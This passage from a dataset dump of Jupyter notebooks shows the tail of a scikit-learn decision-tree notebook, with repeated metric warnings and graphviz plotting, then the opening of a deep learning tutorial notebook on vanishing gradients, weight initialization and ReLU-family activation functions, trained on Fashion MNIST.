warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n" ] ], [ [ "# Visualize Decision Tree", "_____no_output_____" ] ], [ [ "my_data.columns", "_____no_output_____" ], [ "import matplotlib.pyplot as plt \nimport graphviz\nfig = plt.figure(figsize=(25,20))\ndata = tree.export_graphviz(model, \n feature_names=my_data.columns[0:5], \n class_names=my_data.Drug.unique().tolist(),\n 
filled=True)\ngraph = graphviz.Source(data, format=\"png\") \ngraph", "_____no_output_____" ], [ "!pip install graphviz", "Collecting graphviz\n Downloading https://files.pythonhosted.org/packages/62/dc/9dd6a6b9b8977248e165e075b109eea6e8eac71faa28ca378c3d98e54fbe/graphviz-0.14.1-py2.py3-none-any.whl\nInstalling collected packages: graphviz\nSuccessfully installed graphviz-0.14.1\n" ] ], [ [ "<hr>\n\n<div id=\"visualization\">\n <h2>Visualization</h2>\n Lets visualize the tree\n</div>\n", "_____no_output_____" ] ], [ [ "# Notice: You might need to uncomment and install the pydotplus and graphviz libraries if you have not installed these before\n# !conda install -c conda-forge pydotplus -y\n# !conda install -c conda-forge python-graphviz -y", "_____no_output_____" ], [ "from sklearn.externals.six import StringIO\nimport pydotplus\nimport matplotlib.image as mpimg\nfrom sklearn import tree\n%matplotlib inline ", "_____no_output_____" ], [ "dot_data = StringIO()\nfilename = \"drugtree.png\"\nfeatureNames = my_data.columns[0:5]\ntargetNames = my_data[\"Drug\"].unique().tolist()\nout=tree.export_graphviz(drugTree,feature_names=featureNames, out_file=dot_data, class_names= np.unique(y_trainset), filled=True, special_characters=True,rotate=False) \ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue()) \ngraph.write_png(filename)\nimg = mpimg.imread(filename)\nplt.figure(figsize=(100, 200))\nplt.imshow(img,interpolation='nearest')", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
e72e3d1d31964735f478d607458627509795fadc
390,761
ipynb
Jupyter Notebook
11_training_deep_neural_networks.ipynb
mlbvn/d2l-book-vn
3d02753661e11f18172d1e735e7c0e5b1ca08d58
[ "Apache-2.0" ]
139
2021-01-09T00:50:46.000Z
2022-03-04T07:35:41.000Z
11_training_deep_neural_networks.ipynb
mlbvn/d2l-book-vn
3d02753661e11f18172d1e735e7c0e5b1ca08d58
[ "Apache-2.0" ]
17
2021-07-10T12:34:28.000Z
2022-03-12T05:27:33.000Z
11_training_deep_neural_networks.ipynb
mlbvn/d2l-book-vn
3d02753661e11f18172d1e735e7c0e5b1ca08d58
[ "Apache-2.0" ]
77
2021-01-14T23:08:19.000Z
2022-02-24T07:21:04.000Z
81.903375
32,570
0.740087
[ [ [ "**Chapter 11 – Training Deep Neural Networks**", "_____no_output_____" ], [ "_This notebook contains all the sample code and solutions to the exercises in chapter 11._", "_____no_output_____" ], [ "<table align=\"left\">\n <td>\n <a href=\"https://colab.research.google.com/github/ageron/handson-ml2/blob/master/11_training_deep_neural_networks.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://kaggle.com/kernels/welcome?src=https://github.com/ageron/handson-ml2/blob/add-kaggle-badge/11_training_deep_neural_networks.ipynb\"><img src=\"https://kaggle.com/static/images/open-in-kaggle.svg\" /></a>\n </td>\n</table>", "_____no_output_____" ], [ "# Setup", "_____no_output_____" ], [ "Đầu tiên hãy nhập một vài mô-đun thông dụng, đảm bảo rằng Matplotlib sẽ vẽ đồ thị ngay trong notebook, và chuẩn bị một hàm để lưu đồ thị. Ta cũng kiểm tra xem Python phiên bản từ 3.5 trở lên đã được cài đặt hay chưa (mặc dù Python 2.x vẫn có thể hoạt động, phiên bản này đã bị deprecated nên chúng tôi rất khuyến khích việc sử dụng Python 3), cũng như Scikit-Learn ≥ 0.20.", "_____no_output_____" ] ], [ [ "# Python ≥3.5 is required\nimport sys\nassert sys.version_info >= (3, 5)\n\n# Scikit-Learn ≥0.20 is required\nimport sklearn\nassert sklearn.__version__ >= \"0.20\"\n\ntry:\n # %tensorflow_version only exists in Colab.\n %tensorflow_version 2.x\nexcept Exception:\n pass\n\n# TensorFlow ≥2.0 is required\nimport tensorflow as tf\nfrom tensorflow import keras\nassert tf.__version__ >= \"2.0\"\n\n%load_ext tensorboard\n\n# Common imports\nimport numpy as np\nimport os\n\n# to make this notebook's output stable across runs\nnp.random.seed(42)\n\n# To plot pretty figures\n%matplotlib inline\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Where to save the 
figures\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"deep\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)", "_____no_output_____" ] ], [ [ "# Vanishing/Exploding Gradients Problem", "_____no_output_____" ] ], [ [ "def logit(z):\n return 1 / (1 + np.exp(-z))", "_____no_output_____" ], [ "z = np.linspace(-5, 5, 200)\n\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([-5, 5], [1, 1], 'k--')\nplt.plot([0, 0], [-0.2, 1.2], 'k-')\nplt.plot([-5, 5], [-3/4, 7/4], 'g--')\nplt.plot(z, logit(z), \"b-\", linewidth=2)\nprops = dict(facecolor='black', shrink=0.1)\nplt.annotate('Saturating', xytext=(3.5, 0.7), xy=(5, 1), arrowprops=props, fontsize=14, ha=\"center\")\nplt.annotate('Saturating', xytext=(-3.5, 0.3), xy=(-5, 0), arrowprops=props, fontsize=14, ha=\"center\")\nplt.annotate('Linear', xytext=(2, 0.2), xy=(0, 0.5), arrowprops=props, fontsize=14, ha=\"center\")\nplt.grid(True)\nplt.title(\"Sigmoid activation function\", fontsize=14)\nplt.axis([-5, 5, -0.2, 1.2])\n\nsave_fig(\"sigmoid_saturation_plot\")\nplt.show()", "Saving figure sigmoid_saturation_plot\n" ] ], [ [ "## Xavier and He Initialization", "_____no_output_____" ] ], [ [ "[name for name in dir(keras.initializers) if not name.startswith(\"_\")]", "_____no_output_____" ], [ "keras.layers.Dense(10, activation=\"relu\", kernel_initializer=\"he_normal\")", "_____no_output_____" ], [ "init = keras.initializers.VarianceScaling(scale=2., mode='fan_avg',\n distribution='uniform')\nkeras.layers.Dense(10, activation=\"relu\", kernel_initializer=init)", "_____no_output_____" ] ], [ [ "## Nonsaturating Activation Functions", "_____no_output_____" ], [ "### Leaky ReLU", "_____no_output_____" ] 
], [ [ "def leaky_relu(z, alpha=0.01):\n return np.maximum(alpha*z, z)", "_____no_output_____" ], [ "plt.plot(z, leaky_relu(z, 0.05), \"b-\", linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([0, 0], [-0.5, 4.2], 'k-')\nplt.grid(True)\nprops = dict(facecolor='black', shrink=0.1)\nplt.annotate('Leak', xytext=(-3.5, 0.5), xy=(-5, -0.2), arrowprops=props, fontsize=14, ha=\"center\")\nplt.title(\"Leaky ReLU activation function\", fontsize=14)\nplt.axis([-5, 5, -0.5, 4.2])\n\nsave_fig(\"leaky_relu_plot\")\nplt.show()", "Saving figure leaky_relu_plot\n" ], [ "[m for m in dir(keras.activations) if not m.startswith(\"_\")]", "_____no_output_____" ], [ "[m for m in dir(keras.layers) if \"relu\" in m.lower()]", "_____no_output_____" ] ], [ [ "Let's train a neural network on Fashion MNIST using the Leaky ReLU:", "_____no_output_____" ] ], [ [ "(X_train_full, y_train_full), (X_test, y_test) = keras.datasets.fashion_mnist.load_data()\nX_train_full = X_train_full / 255.0\nX_test = X_test / 255.0\nX_valid, X_train = X_train_full[:5000], X_train_full[5000:]\ny_valid, y_train = y_train_full[:5000], y_train_full[5000:]", "_____no_output_____" ], [ "tf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, kernel_initializer=\"he_normal\"),\n keras.layers.LeakyReLU(),\n keras.layers.Dense(100, kernel_initializer=\"he_normal\"),\n keras.layers.LeakyReLU(),\n keras.layers.Dense(10, activation=\"softmax\")\n])", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model.fit(X_train, y_train, epochs=10,\n validation_data=(X_valid, y_valid))", "Epoch 1/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 1.6314 - accuracy: 0.5054 - val_loss: 0.8886 - val_accuracy: 0.7160\nEpoch 2/10\n1719/1719 [==============================] 
- 2s 892us/step - loss: 0.8416 - accuracy: 0.7247 - val_loss: 0.7130 - val_accuracy: 0.7656\nEpoch 3/10\n1719/1719 [==============================] - 2s 879us/step - loss: 0.7053 - accuracy: 0.7637 - val_loss: 0.6427 - val_accuracy: 0.7898\nEpoch 4/10\n1719/1719 [==============================] - 2s 883us/step - loss: 0.6325 - accuracy: 0.7908 - val_loss: 0.5900 - val_accuracy: 0.8066\nEpoch 5/10\n1719/1719 [==============================] - 2s 887us/step - loss: 0.5992 - accuracy: 0.8021 - val_loss: 0.5582 - val_accuracy: 0.8200\nEpoch 6/10\n1719/1719 [==============================] - 2s 881us/step - loss: 0.5624 - accuracy: 0.8142 - val_loss: 0.5350 - val_accuracy: 0.8238\nEpoch 7/10\n1719/1719 [==============================] - 2s 892us/step - loss: 0.5379 - accuracy: 0.8217 - val_loss: 0.5157 - val_accuracy: 0.8304\nEpoch 8/10\n1719/1719 [==============================] - 2s 895us/step - loss: 0.5152 - accuracy: 0.8295 - val_loss: 0.5078 - val_accuracy: 0.8284\nEpoch 9/10\n1719/1719 [==============================] - 2s 911us/step - loss: 0.5100 - accuracy: 0.8268 - val_loss: 0.4895 - val_accuracy: 0.8390\nEpoch 10/10\n1719/1719 [==============================] - 2s 897us/step - loss: 0.4918 - accuracy: 0.8340 - val_loss: 0.4817 - val_accuracy: 0.8396\n" ] ], [ [ "Now let's try PReLU:", "_____no_output_____" ] ], [ [ "tf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, kernel_initializer=\"he_normal\"),\n keras.layers.PReLU(),\n keras.layers.Dense(100, kernel_initializer=\"he_normal\"),\n keras.layers.PReLU(),\n keras.layers.Dense(10, activation=\"softmax\")\n])", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model.fit(X_train, y_train, epochs=10,\n validation_data=(X_valid, y_valid))", "Epoch 
1/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 1.6969 - accuracy: 0.4974 - val_loss: 0.9255 - val_accuracy: 0.7186\nEpoch 2/10\n1719/1719 [==============================] - 2s 990us/step - loss: 0.8706 - accuracy: 0.7247 - val_loss: 0.7305 - val_accuracy: 0.7630\nEpoch 3/10\n1719/1719 [==============================] - 2s 980us/step - loss: 0.7211 - accuracy: 0.7621 - val_loss: 0.6564 - val_accuracy: 0.7882\nEpoch 4/10\n1719/1719 [==============================] - 2s 985us/step - loss: 0.6447 - accuracy: 0.7879 - val_loss: 0.6003 - val_accuracy: 0.8048\nEpoch 5/10\n1719/1719 [==============================] - 2s 967us/step - loss: 0.6077 - accuracy: 0.8004 - val_loss: 0.5656 - val_accuracy: 0.8182\nEpoch 6/10\n1719/1719 [==============================] - 2s 984us/step - loss: 0.5692 - accuracy: 0.8118 - val_loss: 0.5406 - val_accuracy: 0.8236\nEpoch 7/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5428 - accuracy: 0.8194 - val_loss: 0.5196 - val_accuracy: 0.8314\nEpoch 8/10\n1719/1719 [==============================] - 2s 983us/step - loss: 0.5193 - accuracy: 0.8284 - val_loss: 0.5113 - val_accuracy: 0.8316\nEpoch 9/10\n1719/1719 [==============================] - 2s 992us/step - loss: 0.5128 - accuracy: 0.8272 - val_loss: 0.4916 - val_accuracy: 0.8378\nEpoch 10/10\n1719/1719 [==============================] - 2s 988us/step - loss: 0.4941 - accuracy: 0.8314 - val_loss: 0.4826 - val_accuracy: 0.8398\n" ] ], [ [ "### ELU", "_____no_output_____" ] ], [ [ "def elu(z, alpha=1):\n return np.where(z < 0, alpha * (np.exp(z) - 1), z)", "_____no_output_____" ], [ "plt.plot(z, elu(z), \"b-\", linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([-5, 5], [-1, -1], 'k--')\nplt.plot([0, 0], [-2.2, 3.2], 'k-')\nplt.grid(True)\nplt.title(r\"ELU activation function ($\\alpha=1$)\", fontsize=14)\nplt.axis([-5, 5, -2.2, 3.2])\n\nsave_fig(\"elu_plot\")\nplt.show()", "Saving figure elu_plot\n" ] ], [ [ "Implementing ELU in TensorFlow 
is trivial, just specify the activation function when building each layer:", "_____no_output_____" ] ], [ [ "keras.layers.Dense(10, activation=\"elu\")", "_____no_output_____" ] ], [ [ "### SELU", "_____no_output_____" ], [ "This activation function was proposed in this [great paper](https://arxiv.org/pdf/1706.02515.pdf) by Günter Klambauer, Thomas Unterthiner and Andreas Mayr, published in June 2017. During training, a neural network composed exclusively of a stack of dense layers using the SELU activation function and LeCun initialization will self-normalize: the output of each layer will tend to preserve the same mean and variance during training, which solves the vanishing/exploding gradients problem. As a result, this activation function outperforms the other activation functions very significantly for such neural nets, so you should really try it out. Unfortunately, the self-normalizing property of the SELU activation function is easily broken: you cannot use ℓ<sub>1</sub> or ℓ<sub>2</sub> regularization, regular dropout, max-norm, skip connections or other non-sequential topologies (so recurrent neural networks won't self-normalize). However, in practice it works quite well with sequential CNNs. 
If you break self-normalization, SELU will not necessarily outperform other activation functions.", "_____no_output_____" ] ], [ [ "from scipy.special import erfc\n\n# alpha and scale to self normalize with mean 0 and standard deviation 1\n# (see equation 14 in the paper):\nalpha_0_1 = -np.sqrt(2 / np.pi) / (erfc(1/np.sqrt(2)) * np.exp(1/2) - 1)\nscale_0_1 = (1 - erfc(1 / np.sqrt(2)) * np.sqrt(np.e)) * np.sqrt(2 * np.pi) * (2 * erfc(np.sqrt(2))*np.e**2 + np.pi*erfc(1/np.sqrt(2))**2*np.e - 2*(2+np.pi)*erfc(1/np.sqrt(2))*np.sqrt(np.e)+np.pi+2)**(-1/2)", "_____no_output_____" ], [ "def selu(z, scale=scale_0_1, alpha=alpha_0_1):\n return scale * elu(z, alpha)", "_____no_output_____" ], [ "plt.plot(z, selu(z), \"b-\", linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([-5, 5], [-1.758, -1.758], 'k--')\nplt.plot([0, 0], [-2.2, 3.2], 'k-')\nplt.grid(True)\nplt.title(\"SELU activation function\", fontsize=14)\nplt.axis([-5, 5, -2.2, 3.2])\n\nsave_fig(\"selu_plot\")\nplt.show()", "Saving figure selu_plot\n" ] ], [ [ "By default, the SELU hyperparameters (`scale` and `alpha`) are tuned in such a way that the mean output of each neuron remains close to 0, and the standard deviation remains close to 1 (assuming the inputs are standardized with mean 0 and standard deviation 1 too). 
